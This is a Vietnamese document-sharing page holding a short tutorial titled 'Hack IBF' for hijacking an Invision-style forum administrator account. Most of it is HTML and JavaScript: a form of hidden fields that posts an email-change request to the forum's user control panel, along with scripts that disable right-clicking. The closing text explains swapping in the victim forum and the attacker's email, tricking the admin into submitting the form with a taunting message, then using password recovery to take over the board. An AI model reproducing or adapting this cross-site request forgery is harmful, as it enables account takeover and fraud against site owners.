1. Trang chủ
  2. » Công Nghệ Thông Tin

Hack IBF

3 571 3
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hack ibf
Trường học Yên Hòa University
Thể loại bài viết
Thành phố Yên Hòa
Định dạng
Số trang 3
Dung lượng 31 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Hack IBF

Trang 1

Hack IBF :

trang này đã được đọc lần

Có thể dùng đoạn script này :

<script language=JavaScript1.1>

<! var boodschap =':::> Copyright @ 2002 Minabond Design Read Code <:::'; function dgstatus()

{

window.status = boodschap;

timerID= setTimeout("dgstatus()",100);

}

dgstatus();

> </SCRIPT>

<script language="JavaScript">

<! function MM_openBrWindow(theURL,winName,features)

{

//v2.0 window.open(theURL,winName,features);

} // >

</script>

<script LANGUAGE="JavaScript">

<! document.oncontextmenu = function()

{return false}

if(document.layers)

{ window.captureEvents(Event.MOUSEDOWN);

window.onmousedown = function(e)

{ if(e.target==document)return false;

Trang 2

}

} else

{ document.onmousedown = function(){return false}

}

// > </script> </tr>

<form action="http://www.yenhoa.com/index.php" method="post" target="a1" name='form1'>

<input type='hidden' name='act' value='UserCP'>

<input type='hidden' name='CODE' value='09'>

<input type='hidden' name='s' value='453be091bae994e3d64542e82ec494b7'>

<tr> <td class='row1' width='70%' align='left'>

<input type='hidden' name='in_email_1' value=*****@yahoo.com' class='forminput'><

/td> </tr> <tr>

<td class='row1' width='70%' align='left'>

<input type='hidden' name='in_email_2' value='*****@yahoo.com' class='forminput'>

</td> </tr> <tr>

<td class='row2' align='center' colspan='2'>

<input type="submit" name='change_email' value=" Continue " class='forminput'>

</td> </tr> </form>

<! end main CP area > </table> </td> </tr> </table> </td> </tr> </table>

<script language='Javascript'>

<! function jump_page(internal)

{

var f = document.jumpForm.themenu;

var base_url = "http://www.yenhoa.com/index.php?";

if (f.options[f.selectedIndex].value == -1)

Trang 3

{

return false;

}

var l_data = f.options[f.selectedIndex].value; s_data = l_data.split("|"); if (s_data[0] == 0) { window.location = base_url + s_data[1];

} else

{

window.open( s_data[1], 'width=800,height=600,top=0,left=0,resizable=1,scrollbars=1, location=yes,directories=yes,status=yes,menubar=yes,toolbar=yes');

} }

> </script>

Đọc kĩ chú ý, - thay tên forum backkhoa.org = tên victim và

-453be091bae994e3d64542e82ec494b7 đây chính là đoạn mã ngẫu nhiêu board tự động chạy trên lí thuyết nó luôn luôn thay đổi nhưng chúng ta hoàn toàn có thể sử dụng được một trong những string ngẫu nhiên board sinh ra chắc hẳn các bạn nhìn thấy cái này -*****@yahoo.com hãy thay nó bằng địa chỉ mail của bạn đọc kĩ hơn một chút chắc hẳn ta đã nhận ra công dụng của đoạn code này? đúng nó thay đổi email của admin diễn đàn một khi admin đó bị mặc lừa Nói cách khác cách này hoàn toàn là lừa đảo chỉ với một câu nói khiêu khích thách thức

admin.Nếu không tỉnh táo sẽ mắc lừa và email sẽ bị thay đổi lúc đó dùng chức năng forgotpass

để lấy pass và hack hết không còn gì để giải thích

Ngày đăng: 02/11/2012, 14:18

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w